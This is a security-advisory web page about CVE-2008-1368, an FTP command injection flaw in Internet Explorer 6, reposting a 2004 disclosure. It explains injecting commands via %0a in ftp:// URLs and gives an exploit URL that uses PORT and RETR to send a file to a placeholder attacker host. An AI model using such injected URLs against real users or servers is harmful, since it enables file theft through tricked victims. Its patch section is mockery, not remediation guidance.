SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Microsoft Internet Explorer FTP Command Injection Vulnerability


Arrow  SecurityAlert : 3750
Arrow  CVE : CVE-2008-1368
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Given : Yes
Arrow  Credit : Albert Puigsech Galicia
Arrow  Published : 18.03.2008

Arrow  Affected Software : Microsoft Internet Explorer >= 6.0.2800.1106



Arrow  Advisory Text :  

Hello ml,

I would like to point out that this vulnerability (Microsoft Internet
Explorer FTP Command Injection Vulnerability)
has been published long time ago, here is the advisory:
------------------------------------
- ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#15
- ------------------------------------------------------------------
http://www.7a69ezine.org [05/12/2004]
- ------------------------------------------------------------------

Title: Internet Explorer FTP command injection

Author: Albert Puigsech Galicia - <ripe (at) 7a69ezine (dot) org [email
concealed]>

Software: Microsoft Internet Explorer

Versions: >= 6.0.2800.1106

Remote: yes

Exploit: yes

Severity: Low-Medium

- ------------------------------------------------------------------

I. Introduction.

Internet Explorer is a well-known HTTP browser, and like others it can use
more protocols, for example FTP. The security historial of this navigator
is
really cool and we are glad for the excelent work done by Microsoft. We
love
your (in)security features.

II. Description.

In order to access to a server FTP using Internet Explorer you write
"ftp://ftpuser:ftppass@server/directory" in the directions's bar and then
the
navigator connects to the server and executes the following commands (and
other that have omitted because they are not important for this stuff).

USER ftpuser
PASS ftppass
CWD /directory/

The security problem resides in which is posible to inject FTP commands on
the URL adding at the code %0a followed by your injected commands. If you
do
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a" it will execute
those commands.

USER ftpuser
PASS ftppass
CWD /directory
somecommand

The last line is an erroneous command, but it's not a problem because
'somecommand' has already been executed.

III. Exploit

You need to deceive a user to go to your URL and then to introduce a valid
user and password. So yes! The explotation also requires to apply social
engineering. Then you can do a lot of things using this bug like create or
delete files and directories, but probably, the most interesting thing is
to
download files. Its posible to do that using this URL;

ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

Then the server will connect to a.b.c.d and port e,f (see FTP RFC to
translate the port number) and will send the file data.

IV. Patch

Internet Explorer sucks a lot, just turn to Firefox World.

V. Timeline

01/12/2004 - Bug discovered on konqueror browser
03/12/2004 - Tried in IE. Also afected!
05/12/2004 - Advisor released

VI. Extra data

You can find more 7a69ezine advisories on this following link:

http://www.7a69ezine.org/avisos/propios [spanish info]
----------------------------------------------

Cheers,

kralor





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.